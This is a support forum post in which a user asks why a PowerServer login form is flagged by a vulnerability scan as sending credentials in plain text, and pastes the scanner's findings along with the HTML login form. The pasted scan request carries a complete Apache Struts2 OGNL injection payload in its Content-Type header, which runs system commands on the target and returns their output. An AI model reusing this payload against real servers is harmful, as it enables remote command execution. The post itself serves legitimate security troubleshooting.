1. Trevor Holyoak
  2. PowerServer 2020 or older (Obsolete)
  3. Thursday, 29 April 2021 04:50 PM UTC

Is there a way to fix this? The server automatically redirects to HTTPS when the initial web connection is made, but apparently when the IWA login dialog comes up it just uses HTTP? Is there a setting we need to change, or is this a deeper problem?

 

This is what the scan results say:

The Web server uses plain-text form based authentication. A web page exists on the target host which uses an HTML login form. This data is sent from the client to the server in plain-text.

GET /servlet/ HTTP/1.0
Host: {ip address removed}
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0
Content-Type: %{(#nike='multipart/form-data& apos;).(#dm=@ognl.OgnlContext@DEFAULT_MEMB ER_ACCESS).(#_memberAccess?(#_memberAcces s=#dm):((#container=#context['com.opensymp hony.xwork2.ActionContext.container']).(#ognl Util=#container.getInstance(@com.opensymphony.xw ork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPa ckageNames().clear()).(#ognlUtil.getExcludedClasses ().clear()).(#context.setMemberAccess(#dm)))).(#cmd linux='ifconfig').(#cmdwin='ipconfi g').(#iswin=(@java.lang.System@getProperty( 'os.name').toLowerCase().contains(&ap os;win'))).(#cmds=(#iswin?{'cmd.exe&ap os;,'/c',#cmdwin}:{'/bin/bash&apos;,'-c',#cmdlinux})).(#p=new java.lang.Pro cessBuilder(#cmds)).(#p.redirectErrorStream(true)).(# process=#p.start()).(#ros=(@org.apache.struts2.Servl etActionContext@getResponse().getOutputStream())) .(@org.apache.commons.io.IOUtils@copy(#process.g etInputStream(),#ros)).(#ros.flush())}

<form name="LogonForm" method="post" action="./Logon.aspx?ReturnUrl=%2fservlet%2f" id="LogonForm" style=" width:330px;" autocomplete="off">
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJMzU4MzUwNDk4D2QWBgICD2QWAgICDw9kFgIeCm9ua2V5cHJlc3MFGktleXByZXNzQ2hlY2soJ05VTUxFVFVORCcpZAIDDxYCHgRUZXh0BS1BcHBlb24gUG93ZXJTZXJ2ZXIgMjAyMCZuYnNwQnVpbGQmbmJzcDIzMjMuMDBkAgUPFgIeCWlubmVyaHRtbGVkZFv1uIy24hgqz6b76aLqjSBWnmXy5Z8+sia4CcFL859T" />
<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="79179283" />
<div class="input-infor">
<label>
<!--<bean:message key="text.common.username" />-->
&nbsp;&nbsp;<span id="lblUser">User name</span>:
</label>
<!--<html:text property="username" />-->
<input name="username" type="text" maxlength="30" id="username" onkeypress="KeypressCheck(&#39;NUMLETUND&#39;)" />
</div>
<div class="input-infor">
<label>
<!--<bean:message key="text.lable.password" />-->
&nbsp;&nbsp;<span id="lblPassword">Password</span>:
</label>
<!--<html:password property="password" />-->
<input name="password" type="password" id="password" />
</div>
<div class="submit-infor">
<span class="submitSpan">
<!--<html:submit styleClass="button"> <bean:message key="text.button.logon" /> </html:submit> -->
<input type="submit" name="btnSubmit" value="Logon" id="btnSubmit" class="button" />

